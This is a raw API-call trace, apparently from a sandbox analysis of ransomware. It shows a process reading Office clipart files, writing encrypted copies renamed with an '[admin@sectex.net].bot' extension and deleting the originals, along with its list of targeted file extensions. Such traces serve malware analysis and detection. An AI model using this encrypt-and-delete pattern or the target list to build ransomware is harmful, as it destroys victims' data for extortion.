	[0142.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0142.626] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.626] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.627] GetLastError () returned 0x0
	[0142.627] ReadFile (in: hFile=0x3cc, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1870, lpOverlapped=0x0) returned 1
	[0142.635] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1880, lpOverlapped=0x0) returned 1
	[0142.636] ReadFile (in: hFile=0x3cc, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.636] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.636] SetEndOfFile (hFile=0x384) returned 1
	[0142.636] CloseHandle (hObject=0x384) returned 1
	[0142.637] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.637] SetEndOfFile (hFile=0x3cc) returned 1
	[0142.647] CloseHandle (hObject=0x3cc) returned 1
	[0142.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.651] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf")) returned 1
	[0142.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.652] lstrlenW (lpString=".doc") returned 4
	[0142.652] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.652] lstrlenW (lpString=".docx") returned 5
	[0142.652] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.652] lstrlenW (lpString=".pdf") returned 4
	[0142.652] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.652] lstrlenW (lpString=".xls") returned 4
	[0142.652] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.652] lstrlenW (lpString=".xlsx") returned 5
	[0142.652] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.652] lstrlenW (lpString=".ppt") returned 4
	[0142.652] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.653] lstrlenW (lpString=".zip") returned 4
	[0142.653] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.653] lstrlenW (lpString=".rar") returned 4
	[0142.653] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.653] lstrlenW (lpString=".bz2") returned 4
	[0142.653] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.653] lstrlenW (lpString=".7z") returned 3
	[0142.653] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.653] lstrlenW (lpString=".dbf") returned 4
	[0142.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.653] lstrlenW (lpString=".1cd") returned 4
	[0142.653] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.653] lstrlenW (lpString=".jpg") returned 4
	[0142.653] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.653] lstrlenW (lpString=".doc") returned 4
	[0142.653] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.653] lstrlenW (lpString=".docx") returned 5
	[0142.653] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.653] lstrlenW (lpString=".pdf") returned 4
	[0142.653] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.654] lstrlenW (lpString=".xls") returned 4
	[0142.654] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.654] lstrlenW (lpString=".xlsx") returned 5
	[0142.654] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.654] lstrlenW (lpString=".ppt") returned 4
	[0142.654] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.654] lstrlenW (lpString=".zip") returned 4
	[0142.654] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.654] lstrlenW (lpString=".rar") returned 4
	[0142.654] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.654] lstrlenW (lpString=".bz2") returned 4
	[0142.654] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.654] lstrlenW (lpString=".7z") returned 3
	[0142.654] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.654] lstrlenW (lpString=".dbf") returned 4
	[0142.654] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.654] lstrlenW (lpString=".1cd") returned 4
	[0142.654] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 63
	[0142.654] lstrlenW (lpString=".jpg") returned 4
	[0142.654] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.654] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.654] lstrlenW (lpString="BOAT.WMF") returned 8
	[0142.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0142.655] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3350) returned 1
	[0142.655] CloseHandle (hObject=0x398) returned 1
	[0142.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf")) returned 0x20
	[0142.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0142.655] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.655] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0142.656] GetLastError () returned 0x0
	[0142.656] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xd16, lpOverlapped=0x0) returned 1
	[0142.783] WriteFile (in: hFile=0x3cc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xd20, lpOverlapped=0x0) returned 1
	[0142.784] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.784] WriteFile (in: hFile=0x3cc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0142.785] SetEndOfFile (hFile=0x3cc) returned 1
	[0142.785] CloseHandle (hObject=0x3cc) returned 1
	[0142.785] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.785] SetEndOfFile (hFile=0x398) returned 1
	[0142.787] CloseHandle (hObject=0x398) returned 1
	[0142.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.822] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf")) returned 1
	[0142.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.946] lstrlenW (lpString=".doc") returned 4
	[0142.946] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.946] lstrlenW (lpString=".docx") returned 5
	[0142.946] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1
	[0142.946] lstrlenW (lpString=".pdf") returned 4
	[0142.946] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.946] lstrlenW (lpString=".xls") returned 4
	[0142.946] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.946] lstrlenW (lpString=".xlsx") returned 5
	[0142.946] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1
	[0142.946] lstrlenW (lpString=".ppt") returned 4
	[0142.946] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.946] lstrlenW (lpString=".zip") returned 4
	[0142.946] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.946] lstrlenW (lpString=".rar") returned 4
	[0142.946] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.946] lstrlenW (lpString=".bz2") returned 4
	[0142.946] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.946] lstrlenW (lpString=".7z") returned 3
	[0142.946] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.946] lstrlenW (lpString=".dbf") returned 4
	[0142.946] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.946] lstrlenW (lpString=".1cd") returned 4
	[0142.946] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.946] lstrlenW (lpString=".jpg") returned 4
	[0142.946] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.947] lstrlenW (lpString=".doc") returned 4
	[0142.947] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.947] lstrlenW (lpString=".docx") returned 5
	[0142.947] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1
	[0142.947] lstrlenW (lpString=".pdf") returned 4
	[0142.947] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.947] lstrlenW (lpString=".xls") returned 4
	[0142.947] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.947] lstrlenW (lpString=".xlsx") returned 5
	[0142.947] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1
	[0142.947] lstrlenW (lpString=".ppt") returned 4
	[0142.947] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.947] lstrlenW (lpString=".zip") returned 4
	[0142.947] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.947] lstrlenW (lpString=".rar") returned 4
	[0142.947] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.947] lstrlenW (lpString=".bz2") returned 4
	[0142.947] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.947] lstrlenW (lpString=".7z") returned 3
	[0142.947] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.947] lstrlenW (lpString=".dbf") returned 4
	[0142.947] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.947] lstrlenW (lpString=".1cd") returned 4
	[0142.947] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59
	[0142.947] lstrlenW (lpString=".jpg") returned 4
	[0142.947] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.948] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.948] lstrlenW (lpString="BS00078_.WMF") returned 12
	[0142.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0142.959] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=1444) returned 1
	[0142.959] CloseHandle (hObject=0x25c) returned 1
	[0142.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf")) returned 0x20
	[0142.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0142.960] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.960] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0142.960] GetLastError () returned 0x0
	[0142.960] ReadFile (in: hFile=0x25c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x5a4, lpOverlapped=0x0) returned 1
	[0143.186] WriteFile (in: hFile=0x2a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0143.187] ReadFile (in: hFile=0x25c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.187] WriteFile (in: hFile=0x2a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.187] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.187] CloseHandle (hObject=0x2a0) returned 1
	[0143.187] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.187] SetEndOfFile (hFile=0x25c) returned 1
	[0143.189] CloseHandle (hObject=0x25c) returned 1
	[0143.189] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf")) returned 1
	[0143.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.217] lstrlenW (lpString=".doc") returned 4
	[0143.217] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.217] lstrlenW (lpString=".docx") returned 5
	[0143.217] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.217] lstrlenW (lpString=".pdf") returned 4
	[0143.217] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.217] lstrlenW (lpString=".xls") returned 4
	[0143.217] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.217] lstrlenW (lpString=".xlsx") returned 5
	[0143.217] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.217] lstrlenW (lpString=".ppt") returned 4
	[0143.217] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.217] lstrlenW (lpString=".zip") returned 4
	[0143.217] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.217] lstrlenW (lpString=".rar") returned 4
	[0143.217] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.217] lstrlenW (lpString=".bz2") returned 4
	[0143.217] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.217] lstrlenW (lpString=".7z") returned 3
	[0143.217] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.217] lstrlenW (lpString=".dbf") returned 4
	[0143.218] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.218] lstrlenW (lpString=".1cd") returned 4
	[0143.218] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.218] lstrlenW (lpString=".jpg") returned 4
	[0143.218] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.218] lstrlenW (lpString=".doc") returned 4
	[0143.218] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.218] lstrlenW (lpString=".docx") returned 5
	[0143.218] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.218] lstrlenW (lpString=".pdf") returned 4
	[0143.218] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.218] lstrlenW (lpString=".xls") returned 4
	[0143.218] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.218] lstrlenW (lpString=".xlsx") returned 5
	[0143.218] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.218] lstrlenW (lpString=".ppt") returned 4
	[0143.218] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.218] lstrlenW (lpString=".zip") returned 4
	[0143.218] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.218] lstrlenW (lpString=".rar") returned 4
	[0143.218] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.218] lstrlenW (lpString=".bz2") returned 4
	[0143.218] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.218] lstrlenW (lpString=".7z") returned 3
	[0143.218] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.218] lstrlenW (lpString=".dbf") returned 4
	[0143.218] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.219] lstrlenW (lpString=".1cd") returned 4
	[0143.219] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63
	[0143.219] lstrlenW (lpString=".jpg") returned 4
	[0143.219] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.219] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.219] lstrlenW (lpString="BS00224_.WMF") returned 12
	[0143.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.242] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=1588) returned 1
	[0143.242] CloseHandle (hObject=0x2a0) returned 1
	[0143.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf")) returned 0x20
	[0143.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
